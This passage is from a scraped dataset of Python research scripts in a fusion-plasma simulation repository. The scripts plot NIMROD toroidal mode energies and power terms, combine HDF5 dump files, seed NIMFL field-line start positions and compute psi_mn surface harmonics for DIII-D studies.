this=step.hcstep(None,None)\n this.load(file)\n steplist.append(this)\n times[ii] = this.time\n for jj, nn in enumerate(nmode_list):\n mag_energy[ii,jj]=this.energyDict['bpert'][nn]\n kin_energy[ii,jj]=this.energyDict['vpert'][nn]\n lin_power[ii,jj]=this.powerDict['vxbeq'][nn] + \\\n this.powerDict['jxbeq'][nn] + \\\n this.powerDict['ngpp'][nn]\n qua_power[ii,jj]=this.powerDict['vxbn0'][nn] + \\\n this.powerDict['jxbn0'][nn]\n non_power[ii,jj]=this.powerDict['vxbp'][nn] + \\\n this.powerDict['jxbp'][nn]\n ohm_power[ii,jj]=this.powerDict['etajp'][nn]\n visc_power[ii,jj]=this.powerDict['divpip'][nn]\n neoi_power[ii,jj]=this.powerDict['divPii'][nn]\n neoe_power[ii,jj]=this.powerDict['divPie'][nn]\n poyn_power[ii,jj]=this.powerDict['poynting'][nn]\n adv_power[ii,jj]=this.powerDict['rhovdveq'][nn] + \\\n this.powerDict['rhovdvn0'][nn] + \\\n this.powerDict['rhovdvp'][nn]\n\n\n #adv_power[ii,jj]=this.powerDict['ngpp'][nn]\n for key in this.powerDict:\n print(key)\n total_power[ii,jj]+=this.powerDict[key][nn]\n total_energy = mag_energy+kin_energy\n total_energy = np.where(total_energy != 0, total_energy,0.01 )\n diss_power = ohm_power + visc_power + neoi_power + neoe_power\n else:\n print(\"Hc plot can not read dumpfiles\")\n raise KeyError\n figsize=[8,6]\n\n #plot magnetic energy\n fig, ax = plt.subplots(figsize=figsize)\n for jj, nn in enumerate(nmode_list):\n label = f\"n = {nn}\"\n plt.plot(times*1000,total_energy[:,jj],label=label,color=color_list[jj])\n plt.legend(ncol=2, loc=1, fontsize = 18,frameon=True)\n plt.title(\"Toroidal Mode Energy\")\n plt.ylabel('Energy [J]')\n plt.xlabel('Time [ms]')\n plt.ylim([0,30])\n ax.axvspan(0, 1.0, alpha=0.2,color='gray')\n plt.tight_layout()\n plt.show()\n\n fig, ax = plt.subplots(figsize=figsize)\n jj=2\n plt.title(\"n=3 Power\")\n plt.plot(times*1000,total_power[:,jj]/1e3,label=\"Total\",color='tab:brown')\n plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"Lin\",color='tab:orange')\n plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"QL\",color='tab:green')\n plt.plot(times*1000,non_power[:,jj]/1e3,label=\"NL\",color='tab:red')\n plt.plot(times*1000,diss_power[:,jj]/1e3,label=\"Diss\",color='tab:purple')\n plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"PF\",color='tab:blue')\n plt.legend(ncol=3, loc='lower center', fontsize = 18,frameon=True)\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n #plt.ylim([0,30])\n ax.axvspan(0, 1.0, alpha=0.2,color='gray')\n plt.axhline(0,color='k')\n plt.tight_layout()\n plt.show()\n\n fig, ax = plt.subplots(figsize=figsize)\n jj=1\n plt.title(\"n=2 Power\")\n plt.plot(times*1000,total_power[:,jj]/1e3,label=\"Total\",color='tab:brown')\n plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"Lin\",color='tab:orange')\n plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"QL\",color='tab:green')\n plt.plot(times*1000,non_power[:,jj]/1e3,label=\"NL\",color='tab:red')\n plt.plot(times*1000,diss_power[:,jj]/1e3,label=\"Diss\",color='tab:purple')\n plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"PF\",color='tab:blue')\n plt.legend(ncol=3, loc='lower center', fontsize = 18,frameon=True)\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.ylim([-300,300])\n ax.axvspan(0, 1.0, alpha=0.2,color='gray')\n plt.axhline(0,color='k')\n plt.tight_layout()\n plt.show()\n\n fig, ax = plt.subplots(figsize=figsize)\n jj=2\n plt.title(\"n=3 Power\")\n plt.plot(times*1000,total_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Total\",color='tab:brown')\n 
plt.plot(times*1000,lin_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Lin\",color='tab:orange')\n plt.plot(times*1000,qua_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"QL\",color='tab:green')\n plt.plot(times*1000,non_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"NL\",color='tab:red')\n plt.plot(times*1000,diss_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Diss\",color='tab:purple')\n plt.plot(times*1000,poyn_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"PF\",color='tab:blue')\n plt.legend(ncol=3, loc='lower center', fontsize = 18,frameon=True)\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.ylim([-20,20])\n ax.set_xlim(left=2.0)\n ax.axvspan(0, 1.0, alpha=0.2,color='gray')\n plt.axhline(0,color='k')\n plt.tight_layout()\n plt.show()\n\n\n fig, ax = plt.subplots(figsize=figsize)\n jj=0\n plt.title(\"n=1 Power\")\n plt.plot(times*1000,total_power[:,jj]/1e3,label=\"Total\",color='tab:brown')\n plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"Lin\",color='tab:orange')\n plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"QL\",color='tab:green')\n plt.plot(times*1000,non_power[:,jj]/1e3,label=\"NL\",color='tab:red')\n plt.plot(times*1000,diss_power[:,jj]/1e3,label=\"Diss\",color='tab:purple')\n plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"PF\",color='tab:blue')\n plt.legend(ncol=3, loc='lower center', fontsize = 18,frameon=True)\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.ylim([-50,50])\n ax.axvspan(0, 1.0, alpha=0.2,color='gray')\n plt.axhline(0,color='k')\n plt.tight_layout()\n plt.show()\n\n\n #plot magnetic energy\n fig, ax = plt.subplots(figsize=figsize)\n for jj, nn in enumerate(nmode_list):\n if nn !=1:\n continue\n label = f\"n = {nn}\"\n# plt.plot(times*1000,total_energy[:,jj],label=label)\n plt.plot(times*1000,total_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=label)\n plt.legend()\n plt.title(\"Effective Growth Rate\")\n plt.ylabel(f'$\\gamma$ [krad/s]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n\n\n #plot power flux\n for jj, nn in enumerate(nmode_list):\n fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"Linear\")\n plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"Quasi-linear\")\n plt.plot(times*1000,non_power[:,jj]/1e3,label=\"Nonlinear\")\n plt.plot(times*1000,ohm_power[:,jj]/1e3,label=\"etaJ\")\n plt.plot(times*1000,total_power[:,jj]/1e3,label=\"total\")\n plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"poynting\")\n plt.legend()\n plt.axhline(0,color='k')\n plt.title(Title)\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n #plot power flux\n for jj, nn in enumerate(nmode_list):\n fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n plt.plot(times*1000,lin_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Linear\")\n plt.plot(times*1000,qua_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Quasi-linear\")\n plt.plot(times*1000,non_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Nonlinear\")\n plt.plot(times*1000,ohm_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"etaJ\")\n plt.plot(times*1000,neoe_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"neoE\")\n plt.plot(times*1000,visc_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Visc\")\n plt.plot(times*1000,total_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"total\")\n plt.plot(times*1000,poyn_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"poynting\")\n plt.legend()\n plt.axhline(0,color='k')\n plt.title(Title)\n plt.ylabel(f'$\\gamma$ 
[krad/s]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n #plot power flux\n for jj, nn in enumerate(nmode_list):\n fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n plt.plot(times*1000,total_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"total\")\n plt.plot(times*1000,qua_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Quasi-linear\")\n plt.plot(times*1000,(total_power[:,jj]-qua_power[:,jj])/(2*total_energy[:,jj])*1e-3,label=\"total\")\n plt.legend()\n plt.axhline(0,color='k')\n plt.title(Title)\n plt.ylabel(f'$\\gamma$ [krad/s]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n #plot power flux\n fig, ax = plt.subplots(figsize=figsize)\n\n plt.plot(times*1000,non_power[:,0],label=\"n =1 \")\n plt.plot(times*1000,non_power[:,1],label=\"n =2 \")\n plt.plot(times*1000,non_power[:,2],label=\"n =3\")\n plt.plot(times*1000,non_power[:,3],label=\"n =4\")\n plt.plot(times*1000,non_power[:,4],label=\"n =5\")\n plt.legend()\n plt.axhline(0,color='k')\n plt.title(Title)\n plt.ylabel(f'$\\gamma$ [krad/s]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n raise\n\n #n=1 power flux\n jj=0\n nn=1\n fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"L\")\n plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"QL\")\n plt.plot(times*1000,non_power[:,jj]/1e3,label=\"NL\")\n plt.plot(times*1000,ohm_power[:,jj]/1e3,label=\"etaJ\")\n plt.plot(times*1000,adv_power[:,jj]/1e3,label=\"adv\")\n# plt.plot(times*1000,visc_power[:,jj]/1e3,label=\"Viscous\")\n# plt.plot(times*1000,neoi_power[:,jj]/1e3,label=\"Neoclassical ion\")\n# plt.plot(times*1000,neoe_power[:,jj]/1e3,label=\"Neoclassical electron\")\n# plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"Poynting\")\n plt.legend()\n plt.title(Title)\n plt.axhline(0,color='k')\n plt.ylim([-60,20])\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n jj=1\n nn=2\n fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"L\")\n plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"QL\")\n plt.plot(times*1000,non_power[:,jj]/1e3,label=\"NL\")\n plt.plot(times*1000,ohm_power[:,jj]/1e3,label=\"etaJ\")\n # plt.plot(times*1000,visc_power[:,jj]/1e3,label=\"Viscous\")\n # plt.plot(times*1000,neoi_power[:,jj]/1e3,label=\"Neoclassical ion\")\n # plt.plot(times*1000,neoe_power[:,jj]/1e3,label=\"Neoclassical electron\")\n # plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"Poynting\")\n plt.legend(loc=2)\n plt.title(Title)\n plt.axhline(0,color='k')\n plt.ylim([-200,250])\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n jj=2\n nn=3\n fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"L\")\n plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"QL\")\n plt.plot(times*1000,non_power[:,jj]/1e3,label=\"NL\")\n plt.plot(times*1000,ohm_power[:,jj]/1e3,label=\"etaJ\")\n # plt.plot(times*1000,visc_power[:,jj]/1e3,label=\"Viscous\")\n # plt.plot(times*1000,neoi_power[:,jj]/1e3,label=\"Neoclassical ion\")\n # plt.plot(times*1000,neoe_power[:,jj]/1e3,label=\"Neoclassical electron\")\n # plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"Poynting\")\n plt.legend(loc=2)\n plt.title(Title)\n plt.axhline(0,color='k')\n #plt.ylim([-200,250])\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n for jj, nn in enumerate(nmode_list):\n 
fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n# plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"Linear\")\n# plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"Quasi-linear\")\n# plt.plot(times*1000,non_power[:,jj]/1e3,label=\"Nonlinear\")\n# plt.plot(times*1000,ohm_power[:,jj]/1e3,label=\"Ohmic\")\n plt.plot(times*1000,visc_power[:,jj]/1e3,label=\"Visc\")\n plt.plot(times*1000,neoi_power[:,jj]/1e3,label=\"Neo ion\")\n plt.plot(times*1000,neoe_power[:,jj]/1e3,label=\"Neo e-\")\n plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"Poyn\")\n# plt.plot(times*1000,press_power[:,jj]/1e3,label=\"Grad P\")\n plt.legend()\n plt.title(Title)\n plt.axhline(0,color='k')\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n for jj, nn in enumerate(nmode_list):\n fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n\n# plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"Linear\")\n# plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"Quasi-linear\")\n# plt.plot(times*1000,non_power[:,jj]/1e3,label=\"Nonlinear\")\n# plt.plot(times*1000,ohm_power[:,jj]/1e3,label=\"Ohmic\")\n plt.plot(times*1000,total_power[:,jj]/1e3,label=\"Total Power\")\n plt.legend()\n plt.title(Title)\n plt.axhline(0,color='k')\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n for this in steplist:\n pass\n# this.print_integrals()\n# nimtime.timer.print_times()\n# print(this.step, this.time)\n #plot data here\n if args['plot']:\n pass\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Ho-Cradick runner.')\n parser.add_argument('--read', action='store_true',help='read pickled data')\n args = vars(parser.parse_args())\n print(args)\n hcplot(args=args)\n" }, { "alpha_fraction": 0.7411273717880249, "alphanum_fraction": 0.743215024471283, "avg_line_length": 33.28571319580078, "blob_id": "eba71caeee4fb1751279670820748171acb09279", "content_id": "ba6a4d78ad7c4bdf34cc28dd8865a5fb7a5fe294", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 479, "license_type": "no_license", "max_line_length": 117, "num_lines": 14, "path": "/diiidNim/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "# diiidNim\nA collection of python scripts that are useful for simulations of DIII-D experiments.\n\n## iCoilWallUtil\nThis script is used to generate a new DIII-D \"wall\", such that all the points are inside the i-coils.\n\n## startPositions\nThis script is used to seed a bunch of NIMFL start positions that lie inside the NIMRODs DIII-D computational domain.\n\n### Todo\n - [ ] Documents scripts\n - [ ] Clean up code\n - [ ] Convert to python 3\n - [ ] Add more scripts from work computer" }, { "alpha_fraction": 0.5517538189888, "alphanum_fraction": 0.5926403999328613, "avg_line_length": 35.55118179321289, "blob_id": "76560a374727e7b7136496252ee62c57e0a2375c", "content_id": "310f600ba61ced168b43aa1987815664da5a7050", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4647, "license_type": "no_license", "max_line_length": 103, "num_lines": 127, "path": "/combineDump/combineDump.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n#\n# Input files:\n# firstDump - hdf5 dump file with equilibrium and first nk perturbation\n# secondDump - hdf5 dump file with last nk perturbation\n# Ouput file:\n# finalDump -hdf5 dump file that has 
combines the perturbed fourier nmodes\n# from each dump file\n# I assume that the is no overlap in keff\nimport h5py\nfrom itertools import product\nimport numpy as np\n\nveList = [ 'bq' , 'diff', 'jq', 'nq', 'peq', 'prq', 'rz', 'vq', 'psi_eq']\nvvList = [ 'imbe', 'imve', 'rebe', 'reve']\n\nvsList = [ 'imconc', 'imnd', 'impe', 'impr', 'imte', 'imti', \\\n 'reconc', 'rend', 'repe', 'repr', 'rete', 'reti' ]\n\n\nbasePath = '/home/research/ehowell/SCRATCH/166439/03300_q104_reorder_combine/vac/'\n\nfirstDump = basePath+'n0-5/dumpglln04.h5'\nsecondDump = basePath+'n5/dumpglln5.h5'\nfinalDump = basePath+'n0-5/dumpglln05.h5'\n\nnewStep=0\nnewTime=0.0\n\nf1 = h5py.File(firstDump, 'r') #fe\nf2 = h5py.File(secondDump, 'r') #fp\nfc = h5py.File(finalDump, 'w') #f0\n\n# reset time and step\nf1.copy(f1['dumpTime'], fc)\nfc['dumpTime'].attrs.modify('vsStep',newStep)\nfc['dumpTime'].attrs.modify('vsTime',newTime)\n\nnk1=f1['keff'].size\nnk2=f2['keff'].size\nnkc = nk1 + nk2\nnewKeff = np.zeros(nkc)\nfor ii in range(nk1):\n newKeff[ii]=f1['keff'][ii]\nfor ii in range(nk2):\n newKeff[nk1+ii]=f2['keff'][ii]\nfc.create_dataset('keff', data=newKeff)\n\nfc.copy(f1['seams'], fc)\n# copy file attriubtes and update nmodes\nfor aname, avalue in f1.attrs.items():\n fc.attrs[aname] = avalue \nfc.attrs['nmodes'] = nkc\n\nfc.create_group('rblocks')\n# rblocks has no attributes\n#for aname, avalue in f1['rblocks'].attrs.items():\n# print(aname,avalue)\n# fc['rblocks'].attrs[aname] = avalue \n#fc['rblocks'].attrs['nmodes'] = nkc\n\n#loop over rblocks in list\nfor re in f1['rblocks'].keys():\n print('Processing rblock ' + re)\n g1 = f1['rblocks/'+re]\n g2 = f2['rblocks/'+re]\n gc = fc.create_group('rblocks/'+re)\n for aname, avalue in g1.attrs.items():\n gc.attrs[aname] = avalue\n gc.attrs['nfour'] = nkc\n\n for d1key, d1value in g1.items():\n# copy eq fieds from first dumpfile\n if d1key.startswith(tuple(veList)):\n gc.create_dataset(d1key, data=d1value)\n for aname, avalue in g1[d1key].attrs.items():\n gc[d1key].attrs[aname] = avalue\n continue\n d2value=g2[d1key][:]\n if(d1key.startswith(tuple(vsList))): #scalar field\n dcvalue=np.zeros([d1value.shape[0],d1value.shape[1],nkc])\n for (iv,jv) in product(range(d1value.shape[0]),range(d1value.shape[1])):\n dcvalue[iv,jv,0:nk1-1]=d1value[iv][jv][0:nk1-1]\n dcvalue[iv,jv,nk1:nkc-1]=d2value[iv][jv][nk1:nkc-1]\n else: #vector field\n dcvalue=np.zeros([d1value.shape[0],d1value.shape[1],3*nkc])\n for (iv,jv) in product(range(d1value.shape[0]),range(d1value.shape[1])):\n for nn in range(nk1):\n dcvalue[iv,jv,3*nn]=d1value[iv][jv][3*nn]\n dcvalue[iv,jv,3*nn+1]=d1value[iv][jv][3*nn+1]\n dcvalue[iv,jv,3*nn+2]=d1value[iv][jv][3*nn+2]\n for nn in range(nk1,nkc):\n dcvalue[iv,jv,3*nn]=d2value[iv][jv][3*(nn-nk1)]\n dcvalue[iv,jv,3*nn+1]=d2value[iv][jv][3*(nn-nk1)+1]\n dcvalue[iv,jv,3*nn+2]=d2value[iv][jv][3*(nn-nk1)+2]\n gc.create_dataset(d1key, data=dcvalue)\n for aname, avalue in g1[d1key].attrs.items():\n gc[d1key].attrs[aname] = avalue\n print(d1key, d1value.shape, d2value.shape, dcvalue.shape)\n# print(d1key,d1value.shape,d2value.shape)\n# for (iv,jv) in product(range(len(d1value)),range(len(d1value[0]))):\n# if d1key.startswith(tuple(vsList)):\n# print(d1key)\n'''\n for de in ge.iteritems() :\n dse = de[1][:]\n if de[0].startswith('psi_eq') : \n continue\n dsp = gp[de[0]][:]\n for (iv,jv) in product(range(len(dse)),range(len(dse[0]))) :\n if de[0].startswith(tuple(vsList)) :\n\tdse[iv][jv] = 0. 
* len(dse[iv][jv])\n\tfor n in nList :\n dse[iv][jv][n] = dsp[iv][jv][nList[n]] \n elif de[0].startswith(tuple(vvList)) :\n\t#if de[0]=='reve0001' :\n\t# print de[0], iv, jv, len(dse[iv][jv]), dse[iv][jv][3*0:3*0+2], dsp[iv][jv][3*nList[0]:3*nList[0]+2]\n\tdse[iv][jv] = 0. * len(dse[iv][jv])\n\tfor n in nList :\n\t dse[iv][jv][3*n] = dsp[iv][jv][3*nList[n]]\n\t dse[iv][jv][3*n+1] = dsp[iv][jv][3*nList[n]+1]\n\t dse[iv][jv][3*n+2] = dsp[iv][jv][3*nList[n]+2]\n \n g0.create_dataset(de[0], data=dse)\n for aname, avalue in ge[de[0]].attrs.items():\n g0[de[0]].attrs[aname] = avalue\n'''\n " }, { "alpha_fraction": 0.40676796436309814, "alphanum_fraction": 0.42196133732795715, "avg_line_length": 39.25, "blob_id": "b45d783659f78268e2f8ebfffed11ce988fa3081", "content_id": "096eb15fff61d27e94bd284ff807bc3a66ede3d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1448, "license_type": "no_license", "max_line_length": 83, "num_lines": 36, "path": "/nimflSeed/nimflSeed.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' This script randomly generates a collection of seed locations of NIMFL\nfield line integration'''\n\n################################################################################\n# Set up envirment and import modules\n################################################################################\nimport sys\nsys.path.insert(0, \"./\")\nimport os\nimport startPosClass as sp\npwd = os.getcwd()\nhomeDir = os.environ['HOME']\n################################################################################\n# User defined input\n################################################################################\nfileName = \"start_positions.dat_1\"\nwriteDirectory = pwd\nwriteDirectory = homeDir + \"/SCRATCH/174446_novac_debug/nonlin1_eq26_rmp_nimfl/179\"\nnPoints = 2000\ngeom = 'd3dlower'\nphiZero = 0.0\nrandomPhi = True # Ture\n################################################################################\n# Set up auxiliary variables \n################################################################################\nwriteFile = writeDirectory + \"/\" + fileName\n################################################################################\n# Run code\n################################################################################\n#initalize start position object\nstartPos = sp.startPosClass(nPoints,geom,randomPhi,phiZero)\n# generate starting points\nstartPos.calculateRZPhi()\n# write output\nstartPos.writeStartPos(writeFile)" }, { "alpha_fraction": 0.572534441947937, "alphanum_fraction": 0.6027249097824097, "avg_line_length": 32.4663200378418, "blob_id": "28d7f016da1597673fe44cd1b5f2a6d9dd01e526", "content_id": "7d262ce724f04a65615ea2e03ea1d4b7f2e98bf3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19377, "license_type": "no_license", "max_line_length": 95, "num_lines": 579, "path": "/surfmn_fsa/fsa_surfmn.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n# fsa_surfmn is a class for calculating psi_mn and b_mn\n# note that the differs from previous versions, psimn was previous called bmn\n#\n# b_mn is calcualted to match the DIII-D surfmn calculation\n# M.J. 
Schaffer NF 48 (2008), 024004 eqn A.15\n#\n# the value of b_mn depends on the corrodinate system.\n# see eg., J Park Pop 15 (2008)\n# the value of psi_mn is more robust\n# for any set of Pest-like corrodinate systems psi_mn will be independant\n# of the raidal dimension\n# furthermore for any flux alligned coordinates (e.g. including Hamada, Boozer)\n# the value of psi_mn evalatuted at the rational surface will be the same.\n# \n# For pest-corrodinates B_mn is psi_mn / A * factors(2 pi)\n# where A is the flux-surface surface area calculated using the Jacobian\n# J_surfmn = qR^2/F * R^2 B_p\n#\nimport f90nml\nimport eval_comp_nimrod as ceval\nimport comp_fsa as cfsa\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline\nimport os\nimport h5py\nimport sys\nimport numpy as np\nimport pickle\n\nclass fsasurfmn:\n def __init__(self,dumpfile,nimrodin):\n #start with dump file and nimrod.in info\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.time=None\n self.step=None\n # next include info on how fsa's were performed\n self.mmax=None\n self.ifour=[]\n self.nfour=None\n self.setprofiles=False\n #finally end with the profiles\n self.psin=np.empty([1])\n self.psi=np.empty([1])\n self.rhon=np.empty([1])\n self.q=np.empty([1])\n self.qpsi=np.empty([1])\n self.vprime=np.empty([1])\n self.psimn=np.empty([1])\n self.psicmn=np.empty([1])\n self.psismn=np.empty([1])\n self.calc_surfmn = False\n self.s_surfmn = np.empty([1])\n self.phasemn = None\n def dump(self,file):\n pickle.dump(self.dumpfile,file)\n pickle.dump(self.nimrodin,file)\n pickle.dump(self.time,file)\n pickle.dump(self.step,file)\n # next include info on how fsa's were performed\n pickle.dump(self.mmax,file)\n pickle.dump(self.ifour,file)\n pickle.dump(self.nfour,file)\n pickle.dump(self.setprofiles,file)\n #finally end with the profiles\n if self.setprofiles==True:\n pickle.dump(self.psin,file)\n pickle.dump(self.psi,file)\n pickle.dump(self.rhon,file)\n pickle.dump(self.q,file)\n pickle.dump(self.vprime,file)\n pickle.dump(self.psimn,file)\n pickle.dump(self.psicmn,file)\n pickle.dump(self.psismn,file)\n pickle.dump(self.calc_surfmn,file)\n if self.calc_surfmn == True:\n pickle.dump(self.s_surfmn,file)\n\n def load(self,file):\n self.dumpfile=pickle.load(file)\n self.nimrodin=pickle.load(file)\n self.time=pickle.load(file)\n self.step=pickle.load(file)\n # next include info on how fsa's were performed\n self.mmax=pickle.load(file)\n self.ifour=pickle.load(file)\n self.nfour=pickle.load(file)\n self.setprofiles=pickle.load(file)\n #finally end with the profiles\n if self.setprofiles==True:\n self.psin=pickle.load(file)\n self.psi=pickle.load(file)\n self.rhon=pickle.load(file)\n self.q=pickle.load(file)\n self.vprime=pickle.load(file)\n self.psimn=pickle.load(file)\n self.psicmn=pickle.load(file)\n self.psismn=pickle.load(file)\n try:\n self.calc_surfmn=pickle.load(file)\n except:\n self.calc_surfmn=False\n if self.calc_surfmn == True:\n self.s_surfmn=pickle.load(file)\n\n def get_m_index(self,m):\n '''Return the index for the given m\n Return None if m is out of range'''\n if self.mmax==None:\n write(\"mmax has not be set in get_m_index\")\n raise\n else:\n if m>self.mmax:\n return None\n elif m<-1*self.mmax:\n return None\n else:\n return m+self.mmax\n\n def dummy_fsa(self,rzc,y,dy,evalnimrod,flag,fargs):\n '''\n Dummy integrand for complex fsa, this is used to get v' and q\n without running a true fsa\n Flux surface averge quantities (f/bdgrth where 
y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth :v'\n dy(3)=dq: q\n dy(4)= dummy\n '''\n dy[4]=1.0\n return dy\n\n def surfmn_int(self,rzc,y,dy,evalnimrod,flag,fargs):\n '''\n Integrand for fluxsurface integration\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth\n dy(3)=dq\n dy(4)=dtheta\n dy(5)=J_smn/J_pest * 1/bdgth\n '''\n #self.mmax=fargs.get(\"mmax\")\n b0=np.array(cfsa.get_b0(evalnimrod,rzc,flag))\n b = evalnimrod.eval_field('b', rzc, dmode=0)\n rr =rzc[0]\n q=self.qpsi(fargs.get('psi'))\n jac=rr*q/b0[2]\n dy[4] = dy[2]/jac #dtheta\n dy[5] = rr * np.sqrt(b0[0]**2 + b0[1]**2) * dy[2] #add surfmn J\n for ii, im in enumerate(self.ifour):\n oset = ii * (4*self.mmax+1)\n ndx = evalnimrod.modelist.index(im)\n reb=np.real(b[:,ndx]) #im+1]) #im+1 is true for nonlinear only\n imb=np.imag(b[:,ndx]) #im+1]) #todo test nonlinear\n rBePsi=rr*(reb[1]*b0[0]-reb[0]*b0[1])\n iBePsi=rr*(imb[1]*b0[0]-imb[0]*b0[1])\n for im in range(self.mmax):\n nmth=-(self.mmax-im)*y[4] #negative m theta\n pmth=(im+1)*y[4] #positive m theta\n dy[6+im+oset]=(rBePsi*np.cos(nmth)-iBePsi*np.sin(nmth))*dy[2]\n dy[7+self.mmax+im+oset]=(rBePsi*np.cos(pmth)-iBePsi*np.sin(pmth))*dy[2]\n dy[7+2*self.mmax+im+oset]=-(rBePsi*np.sin(nmth)+iBePsi*np.cos(nmth))*dy[2]\n dy[7+3*self.mmax+im+oset]=-(rBePsi*np.sin(pmth)+iBePsi*np.cos(pmth))*dy[2]\n dy[6+self.mmax+oset]=rBePsi*dy[2]\n return dy\n\n\n def get_rho_q(self,q):\n try:\n return interp1d(self.q, self.rhon,\n kind='cubic', fill_value=\"extrapolate\")(q)\n except:\n print(f\"The safety factor {q} is not it the domain\")\n raise\n\n def get_psi_q(self,q):\n try:\n return interp1d(self.q, self.psi,\n kind='cubic', fill_value=\"extrapolate\")(q)\n except:\n print(f\"The safety factor {q} is not it the domain\")\n raise\n\n def get_field_rho(self,field,rhon):\n try:\n return interp1d(self.rhon, field, kind='cubic')(rhon)\n except:\n print(f\"Problem evaluitng field at rhon={rhon}\")\n raise\n\n def compute_phase(self):\n if self.phasemn is None:\n self.phasemn = np.arctan2(self.psismn, self.psicmn)\n\n\n def calculate(self,rzo=None,rzx=None,nsurf=150,eqflag=0,fargs={},**kwargs):\n self.ifour=fargs.get(\"ifour\")\n self.mmax=fargs['mmax']\n self.nfour=len(fargs['ifour'])\n self.setprofiles=True\n\n #first call to fsa is to calcualte q\n cevalnimrod=ceval.EvalCompNimrod(self.dumpfile,fieldlist='nvptbj')\n dvar, yvar, contours = cfsa.FSA(cevalnimrod, rzo, self.dummy_fsa, 1, \\\n nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, 